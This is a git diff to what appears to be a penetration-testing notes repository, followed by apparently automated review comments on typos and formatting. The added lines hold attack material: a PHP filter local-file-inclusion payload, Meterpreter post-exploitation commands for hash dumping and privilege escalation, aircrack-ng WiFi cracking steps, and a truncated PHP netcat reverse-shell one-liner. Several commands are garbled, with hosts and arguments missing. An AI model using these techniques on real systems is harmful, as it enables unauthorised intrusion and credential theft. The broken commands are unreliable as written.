diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index 83be44f..0d04667 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -30,4 +30,9 @@ curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ```HTTP curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' ``` +### Base64 Encoding via PHP +* Circumvent filter via encoding local files included ins a GET parameter value +```http +curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=.php +``` diff --git a/metasploit.md b/metasploit.md index 2c3a0bd..4d8c381 100644 --- a/metasploit.md +++ b/metasploit.md @@ -66,9 +66,30 @@ use multi/http/apache_mod_cgi_bash_env_exec ``` ## Post Exploitation +* `load kiwi` +* `load python` * Windows - * `load kiwi` - * `hashdump` + * list SAM database + ```sh + migrate + hashdump + ``` + * enum shares + ```sh + post/windows/gather/enum_shares + ``` * Linux * `use post/linux/gather/hashdump` +## Other Meterpreter stuff +* Staged and in disguise running as another servicename +``` +getpid +ps +``` +* Attempt to elevate privileges +```sh +getsystem +``` +* Use `multi/handler` or exploit and get an overview via `show payloads` +* UserID via `getuid` diff --git a/misc/wifi/airmon-ng.md b/misc/wifi/airmon-ng.md new file mode 100644 index 0000000..36d105f --- /dev/null +++ b/misc/wifi/airmon-ng.md @@ -0,0 +1,20 @@ +# aircrack-ng + +## airmon-ng + +* Monitor on interface +```sh +airmon-ng start +``` + +## airodump-ng +* Capture traffic + + +## aircrack-ng +* Use captured network traffic to crack +* Specify targets via common options +* Create hashcap files as `HCCAPX` or `HCCAP` +```sh +aircrack-ng -w -b -j +``` diff --git a/reverse_shells/docs/shell_collection.md b/reverse_shells/docs/shell_collection.md index d22380b..90d7969 100644 --- a/reverse_shells/docs/shell_collection.md +++ b/reverse_shells/docs/shell_collection.md 
@@ -29,3 +29,9 @@ python -c 'import pty; pty.spawn("/bin/bash")' * `ssh-keygen` * copy priv key and `chmod 600` * `cat id_rsa.pub > authorized_keys` on target + +## As Code +### PHP +```sh +&1|nc > /tmp/f') ?> +```
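Review bot: typo in the new bullet in exploit/web/local_file_inclusion.md, `encoding local files included ins a GET parameter value` should read `in a GET parameter value`. In the same hunk the curl line ends in `resource=.php`, so the file name before `.php` has been lost and the command no longer shows what it is meant to; restore an explicit placeholder there. Two style points on that line as well: the new fence is tagged `http` while the existing fence directly above uses `HTTP`, and the URL is unquoted whereas the earlier examples in this file quote it (a `?` in an unquoted URL is subject to shell globbing), so wrap it in single quotes like the lines above.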
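Review bot: the `list SAM database` block in metasploit.md is incomplete, `migrate` is given no process to migrate to and will not run as written; either add the argument the command needs or drop it and keep `hashdump` alone, which is what the removed bullet documented. The `enum shares` block gives a bare module path `post/windows/gather/enum_shares` while the Linux bullet two lines further down writes `use post/linux/gather/hashdump`; use one form for both so the reader knows whether the path is typed into msfconsole or the meterpreter prompt. Under `## Other Meterpreter stuff` the first fence carries no language tag although every other fence in the file uses `sh`, the heading has no blank line separating it from the list above, and `Staged and in disguise running as another servicename` does not say what `getpid` / `ps` are meant to show; reword to something like `Check which process the session is running in`. The `load kiwi` / `load python` bullets that were moved out of the Windows list also need a one-line lead-in saying they are extension loads that apply to any session.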
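Review bot: the new file is named misc/wifi/airmon-ng.md but its H1 is `# aircrack-ng` and it documents three tools, so either rename the file after the suite or split it per tool. The `## airodump-ng` section consists of the single bullet `Capture traffic` and no command, so it reads as an unfinished stub; either complete it or leave it out of this commit. `airmon-ng start` and `aircrack-ng -w -b -j` are missing the values their options take, so each flag should be followed by an explicit placeholder (the interface for `airmon-ng start`; the wordlist, BSSID and output file for `-w`, `-b`, `-j`) rather than being left bare. `Create hashcap files` also looks like a typo for `hashcat`, since `HCCAPX` and `HCCAP` are hashcat input formats; the bullet should say which tool the file is produced for.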
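Review bot: the `### PHP` fence in reverse_shells/docs/shell_collection.md is tagged `sh` but holds PHP, and the snippet begins mid-command at `&1|nc > /tmp/f') ?>` with the opening PHP tag and the function call that the quoted string belongs to missing, so it cannot be used as written; restore the complete line and tag the fence `php`. The `nc` invocation also has no host and port placeholders, unlike the other entries in this file. `## As Code` is a vague heading for a section of one-liners in language files; something like `## Language one-liners` would be clearer, and a blank line before the heading would match the spacing used elsewhere in the file.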